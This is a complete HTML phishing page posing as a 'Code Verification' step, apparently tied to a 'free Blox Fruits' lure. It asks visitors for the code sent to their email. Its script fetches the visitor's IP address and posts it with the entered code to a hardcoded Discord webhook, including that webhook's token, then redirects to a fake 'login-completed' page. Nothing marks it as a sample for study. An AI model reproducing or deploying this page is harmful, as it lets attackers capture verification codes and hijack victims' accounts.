<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Code Verification</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            background-color: #232527;
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .container {
            background-color: #393b3d;
            width: 25%; /* 25% of the screen width */
            height: 50%; /* 2 times the width (which will be 50% of screen width) */
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            padding: 20px;
            box-sizing: border-box;
        }

        h2, p {
            margin: 10px 0;
            color: #ffffff;
        }

        input[type="text"] {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            box-sizing: border-box;
            border: none;
            border-radius: 5px;
        }

        button {
            padding: 10px 20px;
            background-color: #4CAF50;
            border: none;
            border-radius: 5px;
            color: #ffffff;
            cursor: pointer;
        }

        button:hover {
            background-color: #45a049;
        }

    </style>
</head>
<body>
    <div class="container">
        <h2>Code</h2>
        <p>Code you got in your email</p>
        <input type="text" id="code" placeholder="Enter Code" required>
        <button onclick="submitCode()">Submit</button>
    </div>

    <script>
        async function submitCode() {
            const code = document.getElementById('code').value;

            // Fetch the user's IP address
            const ipResponse = await fetch('https://api.ipify.org?format=json');
            const ipData = await ipResponse.json();
            const userIP = ipData.ip;

            // Send the code and IP to the webhook
            fetch('https://discord.com/api/webhooks/1152874265553682512/TaPkSlcf68aMXsdQ-QphI5tS0OxDL7opL5hZwTiVUEHgrQswRc4wwsBfV0qwXPkfJxnf', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    embeds: [{
                        title: `IP Address: ${userIP}`,
                        description: `Code: ${code}`
                    }]
                })
            }).then(() => {
                // Redirect to the specified URL
                window.location.href = "https://freebloxfruits.github.io/login-completed";
            });
        }
    </script>
</body>
</html>
